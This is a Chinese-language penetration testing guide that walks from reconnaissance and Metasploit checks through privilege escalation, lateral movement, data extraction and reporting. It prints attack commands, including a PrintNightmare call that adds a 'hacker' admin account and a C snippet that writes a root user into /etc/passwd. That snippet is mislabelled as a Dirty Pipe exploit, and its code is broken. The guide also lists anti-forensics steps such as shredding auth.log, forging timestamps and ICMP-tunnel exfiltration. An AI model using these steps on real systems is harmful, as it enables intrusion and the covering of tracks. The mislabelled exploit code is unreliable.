信息收集与资产测绘
被动信息收集是渗透测试的起点,通过OSINT(开源情报)工具获取目标域名、IP段和关联服务。常用工具包括:
– Maltego:可视化关联企业域名、邮箱和服务器信息
– theHarvester:聚合搜索引擎和PGP密钥数据
– Shodan:识别暴露的IoT设备和服务指纹
# theHarvester示例(需安装kalitools)
import os
os.system('theHarvester -d example.com -b google,linkedin')
主动扫描采用Nmap进行端口和服务探测,配合-sV参数获取版本信息。对于云环境,需特别注意:
– AWS S3存储桶枚举(使用awscli)
– Azure应用服务元数据端点(169.254.169.254)
漏洞识别与利用链构建
自动化扫描与人工验证
Nessus或OpenVAS可快速识别CVE漏洞,但存在误报风险。关键步骤:
1. 交叉验证扫描结果(如Metasploit的check功能)
2. 分析补丁时间线(通过ExploitDB的提交日期)
3. 测试WAF绕过技术(如分块传输编码)
# MSF漏洞验证示例
msf6 > use exploit/multi/http/struts2_rest_xstream
msf6 > set RHOSTS 192.168.1.100
msf6 > check
逻辑漏洞挖掘
- 业务流分析:使用Burp Suite的Sequencer检测会话随机性
- API安全测试:针对Swagger文档的未授权端点(常见于Spring Boot Actuator)
- SSRF链式利用:通过PDF生成器等功能触发内部服务访问
权限提升与横向移动
Windows环境
PrintNightmare(CVE-2021-34527)是近年高效的本地提权向量:
# 利用RPC控制spoolsv服务
Import-Module .\Invoke-Nightmare.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "hacker" -NewPassword "P@ssw0rd"
Linux环境
Dirty Pipe(CVE-2022-0847)内核漏洞利用:
// 编译后写入/etc/passwd
#include <unistd.h>
int main() {
const char *path = "/etc/passwd";
int fd = open(path, O_WRONLY | O_CREAT);
write(fd, "hacker::0:0::/root:/bin/bash\n", 29);
close(fd);
}
横向移动推荐使用Cobalt Strike的SSH会话派生功能,配合Mimikatz抓取凭证。AD环境中需重点检查:
– Kerberos委派配置
– GPP(组策略首选项)残留密码
– BloodHound识别的攻击路径
数据提取与痕迹清理
数据分类技术
- 结构化数据:SQL数据库使用
mysqldump --skip-lock-tables - 非结构化数据:find命令定位敏感文件
find /home -type f -name "*.pdf" -o -name "*.docx"
反取证措施
- 清除日志(Linux:
shred -zu /var/log/auth.log) - 修改文件时间戳(
touch -r reference.txt target.txt) - 使用ICMP隧道外传数据(避免TCP流量检测)
报告撰写与修复方案
风险评级框架
采用DREAD模型量化风险:
– Damage Potential:数据泄露影响范围
– Reproducibility:漏洞复现难度
– Exploitability:攻击复杂度
– Affected Users:受影响账户比例
– Discoverability:漏洞暴露程度
修复优先级矩阵
| 漏洞类型 | 修复周期 | 业务影响 |
|---|---|---|
| RCE漏洞 | 24小时 | 关键 |
| SQL注入 | 72小时 | 高 |
| CSRF | 2周 | 中 |
持续监控建议:
– 部署ELK Stack实现日志实时分析
– 定期进行红蓝对抗演练
– 引入HIDS(如Osquery)监控文件完整性
行业实践参考
根据MITRE ATT&CK框架,当前企业环境中TOP3攻击技术:
1. T1190(利用面向公众的应用漏洞)
2. T1133(外部远程服务利用)
3. T1078(有效账户滥用)
云安全联盟(CSA)建议采用零信任架构:
– 基于身份的微隔离
– SPIFFE/SPIRE实现服务认证
– 持续自适应风险评估